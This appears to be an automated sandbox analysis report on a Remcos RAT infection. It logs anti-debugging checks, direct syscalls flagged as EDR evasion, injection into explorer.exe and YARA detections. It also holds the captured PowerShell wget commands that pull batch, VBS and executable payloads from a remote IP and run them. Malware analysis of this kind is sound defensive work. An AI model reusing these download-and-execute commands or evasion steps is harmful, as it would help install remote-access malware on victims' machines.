Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6vmware
Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: AUGUST.exe, 0000000E.00000002.2748208338.000000000061F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000013.00000002.3430164963.000001E28B051000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: svchost.exe, 00000013.00000002.3429019232.000001E28582B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPA
Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: AUGUST.exe, 0000000E.00000002.2748208338.000000000061F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}S#;

Source: C:\Users\user\DZIPR.exe	API call chain: ExitProcess graph end node	graph_15-18811
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node	graph_16-18847
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\DZIPR.exe

Code function: 15_2_6FA73F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

15_2_6FA73F34

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

14_2_00406D5D

Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA65D78 mov eax, dword ptr fs:[00000030h]	15_2_6FA65D78
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA65CA0 mov eax, dword ptr fs:[00000030h]	15_2_6FA65CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C535CA0 mov eax, dword ptr fs:[00000030h]	16_2_6C535CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C535D78 mov eax, dword ptr fs:[00000030h]	16_2_6C535D78
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD05D78 mov eax, dword ptr fs:[00000030h]	20_2_6FD05D78
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD05CA0 mov eax, dword ptr fs:[00000030h]	20_2_6FD05CA0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA73F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_6FA73F34
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA7CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_6FA7CE5C
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA78034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_6FA78034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C54CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_6C54CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C543F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_6C543F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C548034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_6C548034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD13F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_6FD13F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD1CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_6FD1CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD18034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_6FD18034

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FD72E09	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6C5366A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FD72DBF	Jump to behavior
Source: C:\Users\user\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FA666A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6C5A2AC2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FD066A2	Jump to behavior
Source: C:\Users\user\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4016 base: 4E79C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4016 base: 2C00000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4256 base: 4E79C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4256 base: 2950000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 5972 base: 4E79C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 5972 base: 2EB0000 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4E79C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 2C00000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4E79C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 2950000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4E79C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 2EB0000	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_0040D72E cpuid

14_2_0040D72E

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,	14_2_00401F9D
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoA,	15_2_6FA84DBC
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	15_2_6FA689B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	16_2_6C554DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	16_2_6C5389B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	20_2_6FD24DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	20_2_6FD089B5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

14_2_00401626

Source: C:\Users\user\DZIPR.exe

Code function: 15_2_6FA7D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

15_2_6FA7D72B

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

14_2_00404FAA

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
